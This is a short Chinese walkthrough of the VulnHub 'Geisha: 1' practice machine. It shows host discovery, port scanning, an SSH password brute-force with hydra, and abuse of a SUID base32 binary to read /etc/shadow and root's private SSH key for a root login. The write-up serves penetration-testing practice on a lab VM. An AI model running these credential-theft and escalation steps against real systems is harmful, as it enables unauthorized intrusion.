虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/geisha-1,481/
虚拟机简介:获取root权限,并查看flag
目标:1个flag
级别:初学者到中级
1、通过netdiscover检测主机IP地址
netdiscover -r 192.168.207.0/24
2、通过nmap进行端口扫描
nmap -A -sS -sV -v -p- 192.168.207.156开放端口为21、22、80、7080、7125、8088、9198
3、WEB渗透测试
3.1 通过访问nmap扫描到开放的http服务,全部同一个页面,没有有用信息
3.2 使用爆破进行测试
hydra -l geisha -P /usr/share/wordlists/rockyou.txt ssh://192.168.207.156得到用户名为:geisha,密码为:letmein
3.3 SSH登录测试
ssh geisha@192.168.207.156 
3.4 查找有sgid二进制文件
find / -perm -u=s -type f 2>/dev/null
3.5 使用base32进行查看/etc/shadow,查看到root值,使用john未破解成功
base32 "/etc/shadow" | base32 --decode
4、系统提权
4.1 复制root目录下的ssh文件
base32 "/root/.ssh/id_rsa" | base32 --decode
4.2 保存获取的值,存放在kali中
4.3 使用秘钥登录服务器
chmod 600 rsassh -i rsa root@192.168.207.156
4.4 查看flag信息
原文始发于微信公众号(安全孺子牛):VulnHub之Geisha:1
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论